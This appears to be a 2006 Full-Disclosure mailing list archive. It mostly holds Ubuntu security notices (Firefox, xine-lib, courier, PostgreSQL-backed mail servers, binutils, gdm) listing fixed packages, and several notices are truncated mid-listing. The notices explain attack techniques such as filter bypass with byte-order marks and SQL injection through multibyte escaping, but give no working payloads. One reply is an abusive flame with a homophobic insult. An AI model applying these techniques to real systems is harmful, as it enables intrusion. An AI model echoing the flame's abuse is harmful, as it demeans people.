chroot for windows :P good stuff. On Thu, 2006-06-08 at 10:14 -0700, Bill Stout wrote: > >34422VS279429422K44W ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-296-1] firefox vulnerabilities
=== Ubuntu Security Notice USN-296-1 June 09, 2006 firefox vulnerabilities CVE-2006-2775, CVE-2006-2776, CVE-2006-2777, CVE-2006-2778, CVE-2006-2779, CVE-2006-2780, CVE-2006-2782, CVE-2006-2783, CVE-2006-2784, CVE-2006-2785, CVE-2006-2786, CVE-2006-2787, CVE-2006-2788 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: firefox1.5.dfsg+1.5.0.4-0ubuntu6.06 After a standard system upgrade you need to restart Firefox to effect the necessary changes. Please note that Firefox 1.0.8 in Ubuntu 5.10 and Ubuntu 5.04 are also affected by these problems. Updates for these Ubuntu releases will be delayed due to upstream dropping support for this Firefox version. We strongly advise that you disable JavaScript to disable the attack vectors for most vulnerabilities if you use one of these Ubuntu versions. Details follow: Jonas Sicking discovered that under some circumstances persisted XUL attributes are associated with the wrong URL. A malicious web site could exploit this to execute arbitrary code with the privileges of the user. (MFSA 2006-35, CVE-2006-2775) Paul Nickerson discovered that content-defined setters on an object prototype were getting called by privileged UI code. It was demonstrated that this could be exploited to run arbitrary web script with full user privileges (MFSA 2006-37, CVE-2006-2776). A similar attack was discovered by moz_bug_r_a4 that leveraged SelectionObject notifications that were called in privileged context. (MFSA 2006-43, CVE-2006-2777) Mikolaj Habryn discovered a buffer overflow in the crypto.signText() function. By tricking a user to visit a site with an SSL certificate with specially crafted optional Certificate Authority name arguments, this could potentially be exploited to execute arbitrary code with the user's privileges. (MFSA 2006-38, CVE-2006-2778) The Mozilla developer team discovered several bugs that lead to crashes with memory corruption. These might be exploitable by malicious web sites to execute arbitrary code with the privileges of the user. (MFSA 2006-32, CVE-2006-2779, CVE-2006-2780, CVE-2006-2788) Chuck McAuley reported that the fix for CVE-2006-1729 (file stealing by changing input type) was not sufficient to prevent all variants of exploitation. (MFSA 2006-41, CVE-2006-2782) Masatoshi Kimura found a way to bypass web input sanitizers which filter out JavaScript. By inserting 'Unicode Byte-order-Mark (BOM)' characters into the HTML code (e. g. ''), these filters might not recognize the tags anymore; however, Firefox would still execute them since BOM markers are filtered out before processing the page. (MFSA 2006-42, CVE-2006-2783) Paul Nickerson noticed that the fix for CVE-2005-0752 (JavaScript privilege escalation on the plugins page) was not sufficient to prevent all variants of exploitation. (MFSA 2006-36, CVE-2006-2784) Paul Nickerson demonstrated that if an attacker could convince a user to right-click on a broken image and choose "View Image" from the context menu then he could get JavaScript to run on a site of the attacker's choosing. This could be used to steal login cookies or other confidential information from the target site. (MFSA 2006-34, CVE-2006-2785) Kazuho Oku discovered various ways to perform HTTP response smuggling when used with certain proxy servers. Due to different interpretation of nonstandard HTTP headers in Firefox and the proxy server, a malicious web site can exploit this to send back two responses to one request. The second response could be used to steal login cookies or other sensitive data from another opened web site. (MFSA 2006-33, CVE-2006-2786) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.4-0ubuntu6.06.diff.gz Size/MD5: 167298 f47b780d96935c7ec982abf3d1cb23fa http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.4-0ubuntu6.06.dsc Size/MD5: 1109 af86fe956f6cbe2d03bdac43920e8f67 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_1.5.dfsg+1.5.0.4.orig.tar.gz Size/MD5: 42942490 2ac9d43529710e49b06ad6c358716ea4 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/universe/f/firefox/mozilla-firefox-dev_1.5.dfsg+1.5.0.4-0ubuntu6.06_all.deb Size/MD5:48814 29b5ce2c38dae8510506cbe2d10f9cd3 http://security.ubuntu.com/ubuntu/pool/main/f/firefox/mozilla-firefox_1.5.dfsg+1.5.0.4-0ubuntu6.06_all.deb Size/MD5:49706 26c239c98e4ecd26f1b25cb3a9111b02 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/po
Re: [Full-disclosure] Windows Software Restriction Policy Protection Bypass
This MS answer speaks volumes to their approach to security (I had similar made to me in the past) 09.06.06 - Vendor response "Software Restriction Policy and Group Policy are not meant to be complete security features...For full security, we recommend using ACLs to protect the appropriate resources in your environment..." Maybe they should update some of their docs: From http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/rstrplcy.mspx "...Software restriction policies are a new feature in Microsoft(r) Windows(r) XP and Windows Server 2003. This important feature provides administrators with a policy-driven mechanism for identifying software programs running on computers in a domain, and controls the ability of those programs to execute. Software restriction policies can improve system integrity and manageability—which ultimately lowers the cost of owning a computer..." "...Software restriction policies are a part of Microsoft's security and management strategy to assist enterprises in increasing the reliability, integrity, and manageability of their computers. Software restriction policies are one of many new management features in Windows XP and Windows Server 2003. This article provides an in-depth look at how software restriction policies can be used to: Fight viruses,Regulate which ActiveX controls can be downloaded,Run only digitally signed scripts,,Enforce that only approved software is installed on system computers,Lockdown a machine..." From http://www.microsoft.com/technet/security/prodtech/windowsxp/secwinxp/xpsgch06.mspx "...Software restriction policy provides administrators with a way to identify software and control its ability to run on local computers. This tool can help protect computers that run Microsoft(r) Windows(r) XP Professional against known conflicts and safeguard them against malicious software such as viruses and Trojan horse programs. Software restriction policy integrates fully with the Active Directory(r) directory service and Group Policy. You can also use it on stand-alone computers" Dinis Cruz Owasp .Net Project ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [USN-295-1] xine-lib vulnerability
=== Ubuntu Security Notice USN-295-1 June 09, 2006 xine-lib vulnerability CVE-2006-2802 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: libxine1 1.0-1ubuntu3.7 Ubuntu 5.10: libxine1c2 1.0.1-1ubuntu10.3 Ubuntu 6.06 LTS: libxine-main1 1.1.1+ubuntu2-7.1 In general, a standard system upgrade is sufficient to effect the necessary changes. XXX OR XXX After a standard system upgrade you need to reboot your computer to effect the necessary changes. Details follow: Federico L. Bossi Bonin discovered a buffer overflow in the HTTP input module. By tricking an user into opening a malicious remote media location, a remote attacker could exploit this to crash Xine library frontends (like totem-xine, gxine, or xine-ui) and possibly even execute arbitrary code with the user's privileges. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.7.diff.gz Size/MD5: 4636 5cc6919bd457df6beae53e9a84e9e503 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0-1ubuntu3.7.dsc Size/MD5: 1070 1a862dac447d52ecfb8bcdcbb24cf5de http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.orig.tar.gz Size/MD5: 7384258 96e5195c366064e7778af44c3e71f43a amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.7_amd64.deb Size/MD5: 106846 edbbcd4d032bb0e3ff692ac7138fe2fb http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.7_amd64.deb Size/MD5: 3567510 0d1ba9ac491e5482d82acb2f776f21bb i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.7_i386.deb Size/MD5: 106822 86c3f51b3200996f96131c8c53c67506 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.7_i386.deb Size/MD5: 3750458 eff585a1e98695ae4146cd97c7560fcf powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0-1ubuntu3.7_powerpc.deb Size/MD5: 106850 9097246c8357d5a04139bcee0ddbb7b8 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1_1.0-1ubuntu3.7_powerpc.deb Size/MD5: 3925536 8d2576a78270fb2806a18e011a18921a Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.3.diff.gz Size/MD5: 9453 2a3b01a6d858e8623a89e5cce831d392 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1-1ubuntu10.3.dsc Size/MD5: 1186 47fb3762575e25d037c3e6ba2d3d6744 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.0.1.orig.tar.gz Size/MD5: 7774954 9be804b337c6c3a2e202c5a7237cb0f8 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.3_amd64.deb Size/MD5: 108858 8081b6beb283dfefeda7aa0a81d5008e http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.3_amd64.deb Size/MD5: 3611122 99e0979785b3c7c7001d33ddd5e8bb96 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.3_i386.deb Size/MD5: 108864 7dfd068cc168dcc55993d70277901b3d http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.3_i386.deb Size/MD5: 4004210 156188682cd24dbfa922b94d66d2dd63 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine-dev_1.0.1-1ubuntu10.3_powerpc.deb Size/MD5: 108866 1489e831ed6bb874756e0f2f4a44ecca http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/libxine1c2_1.0.1-1ubuntu10.3_powerpc.deb Size/MD5: 3849668 6fdbbe888f1c7ee821af81e16352d61b Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.1.diff.gz Size/MD5:17494 e751ca0a9c5b41b7c4027bef6ace5c06 http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2-7.1.dsc Size/MD5: 1115 6bce2e7e1451f9466a8b18592622257b http://security.ubuntu.com/ubuntu/pool/main/x/xine-lib/xine-lib_1.1.1+ubuntu2.orig.tar.gz Size/MD5: 6099365 5d0f3988e4d95f6af6f3caf2130ee992 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://securi
[Full-disclosure] [USN-294-1] courier vulnerability
=== Ubuntu Security Notice USN-294-1 June 09, 2006 courier vulnerability CVE-2006-2659 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: courier-mta0.47-3ubuntu1.5 Ubuntu 5.10: courier-mta0.47-3ubuntu7.2 Ubuntu 6.06 LTS: courier-mta0.47-13ubuntu5.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: A Denial of Service vulnerability has been found in the function for encoding email addresses. Addresses containing a '=' before the '@' character caused the Courier to hang in an endless loop, rendering the service unusable. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47-3ubuntu1.5.diff.gz Size/MD5: 108704 54427ae8946f3393309424c67b434294 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47-3ubuntu1.5.dsc Size/MD5: 1204 0740cd77bb282a9a6446b0ce0de80419 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier_0.47.orig.tar.gz Size/MD5: 6350808 361a84e497148ce557c150d3576ec24b Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-doc_0.47-3ubuntu1.5_all.deb Size/MD5: 370652 20507345daea36580119b02989159a76 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-authdaemon_0.47-3ubuntu1.5_amd64.deb Size/MD5:62548 d157fe17cf5bc242082644b0e19434e4 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authmysql_0.47-3ubuntu1.5_amd64.deb Size/MD5:57162 9a7094e1805c06a0c5e592a003f4dd30 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authpostgresql_0.47-3ubuntu1.5_amd64.deb Size/MD5:57350 4a586bac446463116f8a752df108d3b2 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-base_0.47-3ubuntu1.5_amd64.deb Size/MD5: 257282 659d6931e7f25352b88a6bffa1be6bba http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-faxmail_0.47-3ubuntu1.5_amd64.deb Size/MD5:28864 38b62157bdbca607c2db3d1866db4cd5 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-imap-ssl_3.0.8-3ubuntu1.5_amd64.deb Size/MD5:21404 b9a740d1a5e4a366449711cb8472a291 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-imap_3.0.8-3ubuntu1.5_amd64.deb Size/MD5: 950548 c1ae151418e74a11af6930f9b733a5f9 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-ldap_0.47-3ubuntu1.5_amd64.deb Size/MD5:74292 d67ac6f6e8df175cc1eb877a766d9f10 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-maildrop_0.47-3ubuntu1.5_amd64.deb Size/MD5: 942804 23c26b6c2f9d69a3baaf77bc9f8cf5c7 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mlm_0.47-3ubuntu1.5_amd64.deb Size/MD5: 122864 b72a7fe87d9458ec172fabe33cb0aa0f http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mta-ssl_0.47-3ubuntu1.5_amd64.deb Size/MD5:19486 2f0fc3d9f7ddd934d0224ab7085cac9a http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-mta_0.47-3ubuntu1.5_amd64.deb Size/MD5: 2157504 6a4f4624f1b01e3c2b4a11ed45370b44 http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-pcp_0.47-3ubuntu1.5_amd64.deb Size/MD5:6 7b8e381af3f0ec2a0d92895e3e7079cb http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-pop-ssl_0.47-3ubuntu1.5_amd64.deb Size/MD5:21202 80c2075c5f9eff0e42d58cd05c5fae3a http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-pop_0.47-3ubuntu1.5_amd64.deb Size/MD5: 423242 217a9fcf78949204f8666e3d1ad0d179 http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-ssl_0.47-3ubuntu1.5_amd64.deb Size/MD5: 195810 82539a6e475e5d83652274e6b4379d0e http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-webadmin_0.47-3ubuntu1.5_amd64.deb Size/MD5:34538 8d78c981468e57c927f593f0b1580c4e http://security.ubuntu.com/ubuntu/pool/universe/c/courier/sqwebmail_0.47-3ubuntu1.5_amd64.deb Size/MD5: 798170 3ac5a00717db529f057ce0da2cefa0ca i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/c/courier/courier-authdaemon_0.47-3ubuntu1.5_i386.deb Size/MD5:56302 d74f86a962af5e41b3248cbb02f5dbbf http://security.ubuntu.com/ubuntu/pool/universe/c/courier/courier-authmysql_0.47-3ubuntu1.5_i386.deb Size/MD5:52212 f550c361
[Full-disclosure] [USN-288-3] PostgreSQL client vulnerabilities
=== Ubuntu Security Notice USN-288-3 June 09, 2006 dovecot, exim4, postfix vulnerabilities CVE-2006-2314, CVE-2006-2753 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: dovecot-common 0.99.13-3ubuntu0.1 exim4-daemon-heavy 4.34-10ubuntu0.1 postfix-pgsql 2.1.5-9ubuntu3.1 Ubuntu 5.10: dovecot-common 0.99.14-1ubuntu1.1 exim4-daemon-heavy 4.52-1ubuntu0.1 postfix-pgsql 2.2.4-1ubuntu2.1 Ubuntu 6.06 LTS: dovecot-common 1.0.beta3-3ubuntu5.1 exim4-daemon-heavy 4.60-3ubuntu3.1 postfix-pgsql 2.2.10-1ubuntu0.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: USN-288-1 described a PostgreSQL client vulnerability in the way the >>'<< character is escaped in SQL queries. It was determined that the PostgreSQL backends of Exim, Dovecot, and Postfix used this unsafe escaping method. For reference, these are the details of the original USN: CVE-2006-2313: Akio Ishida and Yasuo Ohgaki discovered a weakness in the handling of invalidly-encoded multibyte text data. If a client application processed untrusted input without respecting its encoding and applied standard string escaping techniques (such as replacing a single quote >>'<< with >>\'<< or >>''<<), the PostgreSQL server could interpret the resulting string in a way that allowed an attacker to inject arbitrary SQL commands into the resulting SQL query. The PostgreSQL server has been modified to reject such invalidly encoded strings now, which completely fixes the problem for some 'safe' multibyte encodings like UTF-8. CVE-2006-2314: However, there are some less popular and client-only multibyte encodings (such as SJIS, BIG5, GBK, GB18030, and UHC) which contain valid multibyte characters that end with the byte 0x5c, which is the representation of the backslash character >>\<< in ASCII. Many client libraries and applications use the non-standard, but popular way of escaping the >>'<< character by replacing all occurences of it with >>\'<<. If a client application uses one of the affected encodings and does not interpret multibyte characters, and an attacker supplies a specially crafted byte sequence as an input string parameter, this escaping method would then produce a validly-encoded character and an excess >>'<< character which would end the string. All subsequent characters would then be interpreted as SQL code, so the attacker could execute arbitrary SQL commands. To fix this vulnerability end-to-end, client-side applications must be fixed to properly interpret multibyte encodings and use >>''<< instead of >>\'<<. However, as a precautionary measure, the sequence >>\'<< is now regarded as invalid when one of the affected client encodings is in use. If you depend on the previous behaviour, you can restore it by setting 'backslash_quote = on' in postgresql.conf. However, please be aware that this could render you vulnerable again. This issue does not affect you if you only use single-byte (like SQL_ASCII or the ISO-8859-X family) or unaffected multibyte (like UTF-8) encodings. Please see http://www.postgresql.org/docs/techdocs.50 for further details. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_0.99.13-3ubuntu0.1.diff.gz Size/MD5:25404 3c04c4209d088672d44274173375bbae http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_0.99.13-3ubuntu0.1.dsc Size/MD5: 766 62f4a67113049644ff4ba1fe64186644 http://security.ubuntu.com/ubuntu/pool/main/d/dovecot/dovecot_0.99.13.orig.tar.gz Size/MD5: 867787 a84896c4236232b843972370e3730729 http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.34-10ubuntu0.1.diff.gz Size/MD5: 543118 eac768b2342855381a06668e0b9092b5 http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.34-10ubuntu0.1.dsc Size/MD5: 1093 cec092fdddee02a57f057adced2fc2b3 http://security.ubuntu.com/ubuntu/pool/main/e/exim4/exim4_4.34.orig.tar.gz Size/MD5: 1717473 acdf7117f18b71702d4da284b1263275 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.1.5-9ubuntu3.1.diff.gz Size/MD5: 461692 f88e13bc7a3bd0a7f21d4038c6ab1ba6 http://security.ubuntu.com/ubuntu/pool/main/p/postfix/postfix_2.1.5-9ubuntu3.1.dsc Size/MD5: 870 9f52b77f7d9e17750e1b3fe83ea07495
[Full-disclosure] [USN-292-1] binutils vulnerability
=== Ubuntu Security Notice USN-292-1 June 09, 2006 binutils vulnerability CVE-2006-2362 === A security issue affects the following Ubuntu releases: Ubuntu 5.04 Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.04: binutils 2.15-5ubuntu2.3 binutils-dev 2.15-5ubuntu2.3 Ubuntu 5.10: binutils 2.16.1-2ubuntu6.1 binutils-dev 2.16.1-2ubuntu6.1 Ubuntu 6.06 LTS: binutils 2.16.1cvs20060117-1ubuntu2.1 binutils-dev 2.16.1cvs20060117-1ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: CVE-2006-2362 Jesus Olmos Gonzalez discovered a buffer overflow in the Tektronix Hex Format (TekHex) backend of the BFD library, such as used by the 'strings' utility. By tricking an user or automated system into processing a specially crafted file with 'strings' or a vulnerable third-party application using the BFD library, this could be exploited to crash the application, or possibly even execute arbitrary code with the privileges of the user. Updated packages for Ubuntu 5.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15-5ubuntu2.3.diff.gz Size/MD5:42485 80c80af3cabf28f2d94c8050141c1799 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15-5ubuntu2.3.dsc Size/MD5: 781 3193a91375ca923cd096d67e1baf5f70 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15.orig.tar.gz Size/MD5: 15134701 ea140e23ae50a61a79902aa67da5214e Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-doc_2.15-5ubuntu2.3_all.deb Size/MD5: 434164 afd17f5f5fda5ac8bfb51e5f28d2aabe amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.15-5ubuntu2.3_amd64.deb Size/MD5: 2839664 45f59cff5b54b4bc490a5d1a19c6edfb http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.15-5ubuntu2.3_amd64.deb Size/MD5: 8021638 5cff900484834c17832a5e4153d52bea http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15-5ubuntu2.3_amd64.deb Size/MD5: 1368978 5181ad2ba9bc81d3425a40ddd5b7c8b3 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.15-5ubuntu2.3_i386.deb Size/MD5: 2795808 58a177d7b22d4cac79f4aa0e6fce19d8 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.15-5ubuntu2.3_i386.deb Size/MD5: 7868360 0421358316d31dd7eed8e6501b513b1f http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15-5ubuntu2.3_i386.deb Size/MD5: 1323786 d0b38cac43404b4ab990cb8c91297a31 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.15-5ubuntu2.3_powerpc.deb Size/MD5: 3470818 22a23835d8c87e5138f049a1366f8d72 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.15-5ubuntu2.3_powerpc.deb Size/MD5: 9385376 bc2b248edc473e43e5f6e79c07f16f2b http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.15-5ubuntu2.3_powerpc.deb Size/MD5: 1464932 4555df0ac5ec08900a699561b18af0ef Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.1.diff.gz Size/MD5:40719 cc66e2e40734ba885e2ba5aa2fdfefe8 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1-2ubuntu6.1.dsc Size/MD5: 892 cab651309c26e9d0836244566c3b531a http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.16.1.orig.tar.gz Size/MD5: 16378360 818bd33cc45bfe3d5b4b2ddf288ecdea Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-doc_2.16.1-2ubuntu6.1_all.deb Size/MD5: 459696 5ee7d462a7ceb5556696786d77bc35c3 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-dev_2.16.1-2ubuntu6.1_amd64.deb Size/MD5: 2359248 228b915e78af33a0a55a22d9bc5c0d97 http://security.ubuntu.com/ubuntu/pool/universe/b/binutils/binutils-multiarch_2.16.1-2ubuntu6.1_amd64.deb Size/MD5: 7202130 40b75a560600b1875856d4fd0269d7a7 http://security.ubuntu.com/ubuntu/pool/main/b/binutils/binutils-static-udeb_2.16.1-2ubuntu6.1_amd64.udeb Size/MD5: 605800 e8f46421823b202b41d28fa04689faea http://security.ubuntu.com/ubuntu/poo
[Full-disclosure] [USN-293-1] gdm vulnerability
=== Ubuntu Security Notice USN-293-1 June 09, 2006 gdm vulnerability CVE-2006-2452 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: gdm2.8.0.5-0ubuntu1.2 Ubuntu 6.06 LTS: gdm2.14.6-0ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: If the admin configured a gdm theme that provided an user list, any user could activate the gdm setup program by first choosing the setup option from the menu, clicking on the user list and entering his own (instead of root's) password. This allowed normal users to configure potentially dangerous features like remote or automatic login. Please note that this does not affect a default Ubuntu installation, since the default theme does not provide an user list. In Ubuntu 6.06 you additionally have to have the "ConfigAvailable" setting enabled in gdm.conf to be vulnerable (it is disabled by default). Ubuntu 5.04 is not affected by this flaw. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5-0ubuntu1.2.diff.gz Size/MD5:67128 33be1f0d249e20f26a71853429faecef http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5-0ubuntu1.2.dsc Size/MD5: 820 a27629124864eceb8b7bde6d3bc5fce9 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5.orig.tar.gz Size/MD5: 4226618 349b76492113ab814f2732d4ce3a49c2 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5-0ubuntu1.2_amd64.deb Size/MD5: 1618282 de5b62fce24232a5f46c930cd719740d i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5-0ubuntu1.2_i386.deb Size/MD5: 1559904 34f918ecf92c03d0ab4befa70d735670 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.8.0.5-0ubuntu1.2_powerpc.deb Size/MD5: 1571650 2a8967304c094d4a0e79a0c9018fff4d Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6-0ubuntu2.1.diff.gz Size/MD5:75736 c0235a8f490d5b383b07365d7643da5e http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6-0ubuntu2.1.dsc Size/MD5: 885 670690837f6ee2692adfea92d71dd901 http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6.orig.tar.gz Size/MD5: 4681313 6e0e99eb405a9a8e04ff81122723aae5 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6-0ubuntu2.1_amd64.deb Size/MD5: 1779088 d9c3c3cf9c4aebe8f797fafbd8f8e135 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6-0ubuntu2.1_i386.deb Size/MD5: 1714272 78f75e07fc5950e5f61c80ca0188ebaf powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gdm/gdm_2.14.6-0ubuntu2.1_powerpc.deb Size/MD5: 1762968 38d342e8408ad7cd6c613b8aa82e6458 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Separate Debian from Full Disclosure
u d0 realize th4t u r g4y deb1an iz a well kn0wn whitehat diztr0, we do not require deb1anz presence in teh non dizclosure society and theze forums is where u 4ll rally your gay whitehat dizcussionz. s0 mr afghan m4n stfu kthx or face the concequencez On 6/9/06, ßµªSKãR †|wãri <[EMAIL PROTECTED]> wrote: Hi all Here is a request to please do not merge Debian Mailing List's Mails with Full Disclosure -- \ ßµªSKãR †|wãri ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Separate Debian from Full Disclosure
Hi all Here is a request to please do not merge Debian Mailing List's Mails with Full Disclosure-- \ßµªSKãR †|wãri ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] RSBAC 1.2.7 Released
